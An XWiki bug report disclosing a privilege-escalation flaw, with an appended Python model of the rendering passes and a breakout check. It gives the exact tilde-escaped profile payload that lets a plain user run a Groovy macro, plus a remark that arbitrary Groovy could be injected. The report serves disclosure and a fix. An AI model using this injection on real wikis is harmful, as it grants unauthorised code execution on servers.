Details
- Bug
- Resolution: Fixed
- Blocker
- 3.3-milestone-1
- None
- Unit
- Unknown
- N/A
- N/A
Description
Steps to reproduce:
As a user without script or programming rights, edit the about section of your user profile and insert the following:
{{html wiki="true"}}~{~{~/~h~t~m~l~}~}~ ~{~{~c~a~c~h~e~}~}~{~{~g~r~o~o~v~y~}~}~p~r~i~n~t~l~n~(~1~)~{~{~/~g~r~o~o~v~y~}~}~{~{~/~c~a~c~h~e~}~}~{{/html}}
Expected result:
The user profile is displayed normally, with an error saying that the Groovy macro could not be executed.
Actual result:
1</p>{{/html}}</dd>
is displayed, followed by further raw HTML code, showing that the Groovy macro has been executed. This demonstrates a privilege escalation from a plain user account to programming rights. The attack is similar to XWIKI-20313, but instead of targeting UIX execution it targets the display of rich text properties. Note that with HTML comments, full unfiltered Groovy code could be introduced, but I assume that using features like GroovyShell#evaluate, further code could also be easily interpreted from a URL parameter without requiring characters that are lost due to the HTML sanitizer (didn't test).
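The following is an added illustration, not XWiki code and not part of the report: a deliberately small model of the two rendering passes that the reported output suggests. The first pass renders the property with the property author's rights, so the `~`-escaped braces come out as plain text reading `{{/html}} {{cache}}{{groovy}}...`. The second pass, which is an assumption inferred from the `1</p>{{/html}}</dd>` output above rather than a description of XWiki's displayer code, wraps that text in an `{{html}}` macro and renders it again in the profile sheet's context, where the injected `{{/html}}` closes the wrapper early and the Groovy macro runs with the sheet author's rights. The toy renderer knows only the `~` escape and the `html`, `cache` and `groovy` macros, omits paragraph markup, and its `run_groovy` stand-in understands nothing but `println(<int>)`; `NO_PR_ERROR` and `breaks_out_of` are names chosen here.

```python
import re

# Payload from the report, copied verbatim: every character of the inner
# macros is '~'-escaped so that the first rendering pass emits them as text.
PAYLOAD = ('{{html wiki="true"}}'
           '~{~{~/~h~t~m~l~}~}~ ~{~{~c~a~c~h~e~}~}~{~{~g~r~o~o~v~y~}~}'
           '~p~r~i~n~t~l~n~(~1~)~{~{~/~g~r~o~o~v~y~}~}~{~{~/~c~a~c~h~e~}~}~'
           '{{/html}}')

MACRO_START = re.compile(r'\{\{(\w+)((?:\s+\w+="[^"]*")*)\}\}')
NO_PR_ERROR = "[groovy macro error: programming rights required]"  # toy message


def run_groovy(src):
    """Stand-in for the Groovy macro: only understands println(<int>)."""
    m = re.fullmatch(r"\s*println\((\d+)\)\s*", src)
    if not m:
        raise ValueError("toy evaluator only supports println(<int>)")
    return m.group(1)


def render(text, programming):
    """Toy XWiki 2.x-style renderer (assumption: simplified model, not the
    real parser). '~' escapes the next character, so an escaped '{' can
    never open a macro; only html, cache and groovy macros exist."""
    out, i = [], 0
    while i < len(text):
        c = text[i]
        if c == "~":                      # escape: emit next char literally
            if i + 1 < len(text):
                out.append(text[i + 1])
            i += 2
            continue
        m = MACRO_START.match(text, i)
        if not m:
            out.append(c)
            i += 1
            continue
        name = m.group(1)
        params = dict(re.findall(r'(\w+)="([^"]*)"', m.group(2)))
        close = "{{/" + name + "}}"
        end = text.find(close, m.end())   # content ends at the first closer
        if end < 0:                       # unterminated macro: keep as text
            out.append(c)
            i += 1
            continue
        body = text[m.end():end]
        i = end + len(close)
        if name == "html":
            # wiki="true" renders the body as wiki syntax first; otherwise
            # the body is passed through as raw HTML.
            out.append(render(body, programming)
                       if params.get("wiki") == "true" else body)
        elif name == "cache":
            out.append(render(body, programming))
        elif name == "groovy":
            out.append(run_groovy(body) if programming else NO_PR_ERROR)
        else:
            out.append(body)
    return "".join(out)


def breaks_out_of(rendered, macro):
    """True if inserting `rendered` into {{macro}}...{{/macro}} would close
    that macro early: the check a wrapping displayer has to make."""
    return "{{/" + macro + "}}" in rendered


def display_rich_text_property(value, sheet_programming):
    """Model of the vulnerable display path. Pass 1: render the property
    with the property author's rights (none). Pass 2 (assumed from the
    reported output): wrap the result in an html macro and render again
    with the rights of the sheet that displays the profile."""
    first_pass = render(value, programming=False)
    wrapped = "{{html}}" + first_pass + "{{/html}}"
    return render(wrapped, programming=sheet_programming)


if __name__ == "__main__":
    first = render(PAYLOAD, programming=False)
    print("pass 1 (author's rights):", first)
    print("breaks out of {{html}}?  ", breaks_out_of(first, "html"))
    print("pass 2, sheet with PR:    ", display_rich_text_property(PAYLOAD, True))
    print("pass 2, sheet without PR: ", display_rich_text_property(PAYLOAD, False))
```

Run as a script: pass 1 alone yields harmless text, and the model's pass 2 yields ` 1{{/html}}`, the toy counterpart of the `1</p>{{/html}}</dd>` in the report; rendering the wrapper without programming rights yields the error text instead of `1`. The `breaks_out_of` check is the minimum a displayer that re-wraps already-rendered content should apply before doing so.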